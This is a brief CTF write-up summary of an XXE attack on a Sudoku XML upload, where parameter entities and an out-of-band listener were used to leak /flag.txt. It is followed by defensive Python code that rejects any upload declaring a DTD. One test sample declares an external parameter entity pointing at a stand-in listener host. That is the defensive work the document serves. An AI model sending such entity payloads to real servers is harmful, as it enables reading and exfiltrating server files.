Tags: xxe 

The challenge involved uploading a custom XML file to a Sudoku web application. The expected XML structure was restrictive, which required the use of parameter entities. By setting up an out-of-band (OOB) listener, I successfully tested for XXE by referencing an external entity and extracted /etc/hostname and later /flag.txt. The solution involved hosting an external XML file that defined parameter entities to exfiltrate the base64-encoded flag data.
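The mitigation for this class of bug is to refuse any DTD before the real parser sees the upload, since a fixed-schema puzzle never needs a DOCTYPE, let alone a parameter entity pointing at an external DTD. The following is an added example, not code from the writeup or the challenge; it assumes the puzzle arrives as raw XML bytes, and the element names and sample documents are constructed here. It uses stdlib expat purely as a scanner (no external resolver is installed and expat's default parameter-entity parsing is "never"), so declarations are recorded but nothing is fetched.

```python
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET

# Constructed samples: a clean puzzle and one carrying an external parameter
# entity declaration of the kind an OOB XXE probe relies on.
CLEAN_PUZZLE = b"<sudoku><row>53..7....</row></sudoku>"
DTD_PUZZLE = b"""<?xml version="1.0"?>
<!DOCTYPE sudoku [
  <!ENTITY % remote SYSTEM "http://listener.example/oob.dtd">
]>
<sudoku><row>53..7....</row></sudoku>"""


def audit_dtd(xml_bytes):
    """Return a list of findings describing every DTD feature in the document.

    expat is used only to observe declarations: no ExternalEntityRefHandler is
    set and parameter-entity parsing stays at its default of NEVER, so an
    external DTD or parameter entity is reported, never resolved.
    """
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(f"DOCTYPE {name} declared")
        if system_id or public_id:
            findings.append(f"external DTD referenced: {system_id or public_id}")

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation_name):
        kind = "parameter entity" if is_parameter else "general entity"
        if system_id is not None:
            findings.append(f"{kind} {name} points at external {system_id}")
        else:
            findings.append(f"internal {kind} {name} declared")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)
    return findings


def parse_puzzle(xml_bytes):
    """Parse an uploaded puzzle, rejecting any document that carries a DTD."""
    findings = audit_dtd(xml_bytes)
    if findings:
        # Log the findings: a DOCTYPE in a fixed-schema upload is a strong
        # detection signal, and an external parameter entity is unambiguous.
        raise ValueError("upload rejected: " + "; ".join(findings))
    return ET.fromstring(xml_bytes)
```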

Original writeup (https://humble-raptor-f30.notion.site/SunshineCTF-2024-1254c8e5237680128414c01ddd42cc09?pvs=4).